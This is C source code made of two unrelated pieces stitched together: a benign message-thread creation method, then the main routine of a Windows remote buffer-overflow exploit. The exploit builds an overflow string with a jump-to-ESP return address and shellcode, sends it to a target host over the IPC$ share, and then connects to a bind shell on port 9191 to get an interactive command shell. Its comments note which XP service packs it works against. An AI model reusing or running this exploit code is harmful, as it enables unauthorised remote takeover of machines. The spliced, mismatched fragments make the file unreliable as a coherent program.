BOOL CMsgThread::CreateThread( )
{
int nret = 0 ;
bool br = true;
m_pSemaphore = new COSSemaphore(0) ;
ASSERT(m_pSemaphore);
#if defined(_WIN32) || defined(_WIN64)
m_hThread = beginthread(NULL, 0, DefaultThreadProc, (LPVOID)this, 0, &m_ThreadId);
if(NULL == m_hThread)
{
br = false;
}
#else
nret = beginthread(&m_hThread, NULL, DefaultThreadProc, (void*)this);
if (0 != nret)
{
printf(("create CMsgThread failed err code = %d %s\n"),nret,(GetErrMsg(nret)).c_str());
br = false;
}
#endif
return br;
}
// ***************************************************************
int main(int argc,char *argv[])
{
WSADATA wsdata;
int sock;
unsigned short port = 9191;
struct sockaddr_in target;
unsigned long ip;
char opt;
int tgt_type = 0;
char *tgt_host;
if (argc<2) { usage(argv[0]); }
while((opt = getopt(argc,argv,"h:t:v"))!=EOF) {
switch(opt)
{
case 'h':
tgt_host = optarg;
snprintf(tgt_net,127, "\\\\%s", optarg);
snprintf(ipc,127, "\\\\%s\\ipc$", optarg);
break;
case 't':
tgt_type = atoi(optarg);
if (tgt_type == 0 || tgt_type > sizeof(targets) / 8) {
showtargets();
}
break;
default:
usage(argv[0]);
break;
}
}
printf("\n[+] Prepare exploit string\n");
memset(expl, 0x00, sizeof(expl));
memset(expl, 0x41, 2064);
memcpy(&expl[2044], (unsigned char *) &targets[tgt_type-1].jmpesp, 4);
//memcpy(&expl[2044], "BBBB", 4);
memcpy(&expl[2064], shellcode, sizeof(shellcode)); // begin shellcode here
memset(expl_uni, 0x00, sizeof(expl_uni));
memset(tgt_net_uni, 0x00, sizeof(tgt_net_uni));
mbstowcs(tgt_net_uni, tgt_net, sizeof(tgt_net));
switch(tgt_type) {
case 1:
case 3:
MultiByteToWideChar(CP_ACP, 0, expl, sizeof(expl), (unsigned short *)expl_uni,sizeof(expl_uni));
// MultiByteToWideChar - 100 % work at XP+SP0+Rollup
break;
case 2:
mbstowcs(expl_uni, expl, sizeof(expl)); // work at XP+SP1
break;
default:
mbstowcs(expl_uni, expl, sizeof(expl));
break;
}
beginthread(send_exp,0,NULL);
printf("[+] Sleep at 2s ... \n");
sleep(2000);
if (WSAStartup(MAKEWORD(2,0),&wsdata)!=0) {
printf("[x] WSAStartup error...\n");
WSACleanup();
return 1;
}
printf("[+] Initialize WSAStartup - OK\n");
if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
printf("[x] Socket not initialized! Exiting...\n");
WSACleanup();
return 1;
}
printf("[*] Socket initialized - OK\n");
ip=gimmeip(tgt_host);
memset(&target, 0, sizeof(target));
target.sin_family=AF_INET;
target.sin_addr.s_addr = ip;
target.sin_port=htons(port);
printf("[+] Try connecting to %s:%d ...\n",tgt_host,port);
if(connect(sock,(struct sockaddr *)&target, sizeof(target))!=0) {
printf("\n[x] Exploit failed or is Filtred. Exiting...\n");
WSACleanup();
exit(1);
}
printf("[*] Connected to shell at %s:%d\n\n",inet_ntoa(target.sin_addr),port);
cmdshell2(sock);
closesocket(sock);
WSACleanup();
return 0;
}